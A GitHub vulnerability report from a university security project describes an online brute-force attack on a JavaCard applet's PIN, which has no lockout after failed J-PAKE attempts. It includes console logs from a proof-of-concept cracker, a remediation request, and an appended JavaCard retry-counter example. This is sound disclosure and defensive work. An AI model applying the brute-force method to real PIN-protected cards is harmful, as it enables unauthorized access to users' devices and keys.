santomet/pv204_project

🔴 Security Vulnerability: PIN of the applet can be cracked with an online brute-force attack

mvondracek opened this issue · 0 comments

  • Severity: HIGH
  • Vulnerability Class: lack of online brute-force protections
  • Description: According to the report, failed J-PAKE causes the application or applet to terminate the session (pp. 2–3). This was checked during code review. However, the applet does not block itself after several failed key agreements with an incorrect PIN. It is possible to perform an online brute-force attack to crack the PIN. This issue still applies even if the applet would be correctly installed with a randomly generated PIN (see #5).
  • Exploit: In order to demonstrate the high severity of this issue, we have developed an example exploit. Our application PV204Cracker (PIN Cracker for AlmostSecureApplet) is able to crack the PIN of the selected applet. Our PoC without any optimizations is able to brute-force the whole state space of numeric PINs in under 13 minutes on the author's laptop (see below). The example PIN hardcoded as "1234" was cracked 82 seconds after starting from "0000". Our implemented PoC exploit is available in our forked repository.
  • Remediation: The applet must detect attempts to communicate with incorrect PIN, and it must securely and persistently count them. The applet must block itself when some defined threshold is reached (e.g., after 3 incorrect PINs).
  • Location: for example applets/AlmostSecureApplet.java:334

Example output of implemented PIN cracker

PIN Cracker for AlmostSecureApplet
           ,-.
          / \  `.  __..-,O
         :   \ --''_..-'.'
         |    . .-' `. '.
         :     .     .`.'
          \     `.  /  ..
           \      `.   ' .
            `,       `.   \
           ,|,`.        `-.\
          '.||  ``-...__..-`
           |  |
           |__|
           /||\
          //||\\
         // || \\
      __//__||__\\__
     '--------------'

Connecting to card...
getInstance of assymetric algo: 10
getInstance of assymetric algo: 10 is OK!
Done.
Verbosity: output info after every 400 tried PINs
Start cracking...
2020-05-09 14:48:46.436 #0      pin = 00 00 00 00           [0, 0, 0, 0]
2020-05-09 14:49:14.051 #400    pin = 00 04 00 00           [0, 4, 0, 0]
2020-05-09 14:49:40.035 #800    pin = 00 08 00 00           [0, 8, 0, 0]
2020-05-09 14:50:06.586 #1200   pin = 01 02 00 00           [1, 2, 0, 0]
elapsed: 82418 ms
correct pin=[1, 2, 3, 4]

Output of implemented PIN cracker while all numeric PINs are searched under 13 minutes

PIN Cracker for AlmostSecureApplet
           ,-.
          / \  `.  __..-,O
         :   \ --''_..-'.'
         |    . .-' `. '.
         :     .     .`.'
          \     `.  /  ..
           \      `.   ' .
            `,       `.   \
           ,|,`.        `-.\
          '.||  ``-...__..-`
           |  |
           |__|
           /||\
          //||\\
         // || \\
      __//__||__\\__
     '--------------'

Connecting to card...
getInstance of assymetric algo: 10
getInstance of assymetric algo: 10 is OK!
Done.
Verbosity: output info after every 400 tried PINs
Start cracking...
2020-05-09 16:51:23.205 #0      pin = 00 00 00 00           [0, 0, 0, 0]
2020-05-09 16:51:53.380 #400    pin = 00 04 00 00           [0, 4, 0, 0]
2020-05-09 16:52:28.001 #800    pin = 00 08 00 00           [0, 8, 0, 0]
2020-05-09 16:52:56.242 #1200   pin = 01 02 00 00           [1, 2, 0, 0]
2020-05-09 16:53:25.937 #1600   pin = 01 06 00 00           [1, 6, 0, 0]
2020-05-09 16:54:01.472 #2000   pin = 02 00 00 00           [2, 0, 0, 0]
2020-05-09 16:54:33.435 #2400   pin = 02 04 00 00           [2, 4, 0, 0]
2020-05-09 16:55:02.400 #2800   pin = 02 08 00 00           [2, 8, 0, 0]
2020-05-09 16:55:30.321 #3200   pin = 03 02 00 00           [3, 2, 0, 0]
2020-05-09 16:56:02.271 #3600   pin = 03 06 00 00           [3, 6, 0, 0]
2020-05-09 16:56:28.962 #4000   pin = 04 00 00 00           [4, 0, 0, 0]
2020-05-09 16:56:57.817 #4400   pin = 04 04 00 00           [4, 4, 0, 0]
2020-05-09 16:57:27.712 #4800   pin = 04 08 00 00           [4, 8, 0, 0]
2020-05-09 16:57:58.589 #5200   pin = 05 02 00 00           [5, 2, 0, 0]
2020-05-09 16:58:28.075 #5600   pin = 05 06 00 00           [5, 6, 0, 0]
2020-05-09 16:58:58.125 #6000   pin = 06 00 00 00           [6, 0, 0, 0]
2020-05-09 16:59:30.312 #6400   pin = 06 04 00 00           [6, 4, 0, 0]
2020-05-09 17:00:01.441 #6800   pin = 06 08 00 00           [6, 8, 0, 0]
2020-05-09 17:00:29.815 #7200   pin = 07 02 00 00           [7, 2, 0, 0]
2020-05-09 17:00:59.417 #7600   pin = 07 06 00 00           [7, 6, 0, 0]
2020-05-09 17:01:29.951 #8000   pin = 08 00 00 00           [8, 0, 0, 0]
2020-05-09 17:02:04.731 #8400   pin = 08 04 00 00           [8, 4, 0, 0]
2020-05-09 17:02:40.510 #8800   pin = 08 08 00 00           [8, 8, 0, 0]
2020-05-09 17:03:11.007 #9200   pin = 09 02 00 00           [9, 2, 0, 0]
2020-05-09 17:03:41.565 #9600   pin = 09 06 00 00           [9, 6, 0, 0]
elapsed: 768007 ms

Discovered by Team Emerald.
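The remediation above asks for a persistent, securely maintained failed-attempt counter that blocks the applet at a threshold. The following is an added example in JavaCard-style Java, not code from the project or the reporter; the class and method names are assumptions, and the J-PAKE key-confirmation values are assumed to arrive as byte arrays from the caller:

```java
import javacard.framework.ISO7816;
import javacard.framework.ISOException;
import javacard.framework.JCSystem;

// Hypothetical helper class; names are assumptions, not the project's code.
public class PinRetryGuard {
    private static final byte MAX_FAILED_ATTEMPTS = (byte) 3;
    // ISO 7816-4 status word "authentication method blocked"
    private static final short SW_PIN_BLOCKED = (short) 0x6983;

    // An applet instance field lives in persistent memory (EEPROM), so the
    // count survives reset and card removal. A JCSystem.makeTransientByteArray
    // buffer would be wiped on every power cycle and defeat the purpose.
    private byte failedAttempts;

    // Call before starting any J-PAKE round: a blocked applet must not even
    // begin a new key agreement.
    public void requireNotBlocked() {
        if (failedAttempts >= MAX_FAILED_ATTEMPTS) {
            ISOException.throwIt(SW_PIN_BLOCKED);
        }
    }
    // J-PAKE key-confirmation step: compares the confirmation value the card
    // computed with the one the host sent. Returns normally only on success.
    public void confirmKey(byte[] expected, short expOff,
                           byte[] received, short recOff, short len) {
        requireNotBlocked();
        // Charge the attempt BEFORE comparing, in its own transaction, so that
        // tearing the card out during the comparison cannot yield free guesses.
        JCSystem.beginTransaction();
        failedAttempts++;
        JCSystem.commitTransaction();
        // Constant-time comparison: accumulate differences rather than
        // returning at the first mismatching byte.
        byte diff = 0;
        for (short i = 0; i < len; i++) {
            diff |= (byte) (expected[(short) (expOff + i)]
                          ^ received[(short) (recOff + i)]);
        }
        if (diff != 0) {
            // Caller must discard the derived session key; the counter stays charged.
            ISOException.throwIt(ISO7816.SW_SECURITY_STATUS_NOT_SATISFIED);
        }
        // Correct PIN: reset the counter, again atomically.
        JCSystem.beginTransaction();
        failedAttempts = 0;
        JCSystem.commitTransaction();
    }
}
```

Once the threshold is reached there is deliberately no way to clear the counter from this class; an unblock path (for example a PUK) would be a separate, equally rate-limited mechanism.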